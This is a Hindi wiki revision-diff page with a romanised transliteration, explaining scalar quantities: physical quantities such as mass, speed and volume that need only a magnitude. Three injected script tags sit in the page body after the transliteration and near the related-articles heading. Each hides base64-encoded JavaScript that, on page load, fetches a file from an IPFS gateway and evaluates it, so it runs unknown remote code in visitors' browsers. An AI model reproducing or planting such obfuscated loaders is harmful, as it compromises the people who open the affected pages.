Difference between revisions of "अदिश राशि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(9 intermediate revisions by 4 users not shown)
Line 1: Line 1:
कुछ भौतिक राशियों जैसे [[द्रव्यमान]], [[चाल (भौतिकी)|चाल]], [[आयतन]] आदि को निरूपित करने के लिए, केवल उसके परिमाण की आवश्यकता होती है। इनके निरूपण में दिशा की कोई आवश्यकता नहीं होती है। उदाहरण स्वरूप यदि किसी पिण्ड का द्रव्यमान पाँच किग्रा., वस्तु की चाल दस किमी. प्रति घण्टा आदि। अतः जिन भौतिक राशियों को पूर्णतः निरूपित करने के लिए केवल परिमाण की आवश्यकता होती है, दिशा की नहीं, उन्हें '''अदिश राशियाँ''' कहते हैं। जैसे—[[समय]], चाल, द्रव्यमान, [[कार्य]], [[ऊर्जा]], [[कोण]], [[आवेग]], आयतन, [[घनत्व]], [[दाब]], [[वैद्युत धारा]], [[ताप]], [[आवृत्ति]], विशिष्ट ऊष्मा आदि।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Scaler Quanities) कुछ भौतिक राशियों जैसे [[द्रव्यमान]], [[चाल]], आयतन आदि को निरूपित करने के लिए, केवल उसके परिमाण की आवश्यकता होती है। इनके निरूपण में दिशा की कोई आवश्यकता नहीं होती है। उदाहरण स्वरूप यदि किसी पिण्ड का द्रव्यमान पाँच किग्रा., वस्तु की चाल दस किलोमीटर प्रति घण्टा आदि। अतः जिन भौतिक राशियों को पूर्णतः निरूपित करने के लिए केवल परिमाण की आवश्यकता होती है, दिशा की नहीं, उन्हें '''अदिश राशियाँ''' कहते हैं। जैसे—समय, चाल, द्रव्यमान, [[कार्य (भौतिकी)|कार्य]], [[ऊर्जा]], कोण, [[आवेग]], आयतन, [[घनत्त्व]], [[दाब]], वैद्युत धारा, [[ताप]], [[आवृति]], विशिष्ट ऊष्मा आदि।
 
 
  
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==संबंधित लेख==
[[Category:नया पन्ना]][[Category:विज्ञान कोश]]
+
{{भौतिक विज्ञान}}
 +
[[Category:भौतिक विज्ञान]]
 +
[[Category:विज्ञान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:34, 4 October 2011

(aangrezi:Scaler Quanities) kuchh bhautik rashiyoan jaise dravyaman, chal, ayatan adi ko niroopit karane ke lie, keval usake pariman ki avashyakata hoti hai. inake niroopan mean disha ki koee avashyakata nahian hoti hai. udaharan svaroop yadi kisi pind ka dravyaman paanch kigra., vastu ki chal das kilomitar prati ghanta adi. atah jin bhautik rashiyoan ko poornatah niroopit karane ke lie keval pariman ki avashyakata hoti hai, disha ki nahian, unhean adish rashiyaan kahate haian. jaise—samay, chal, dravyaman, kary, oorja, kon, aveg, ayatan, ghanattv, dab, vaidyut dhara, tap, avriti, vishisht ooshma adi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>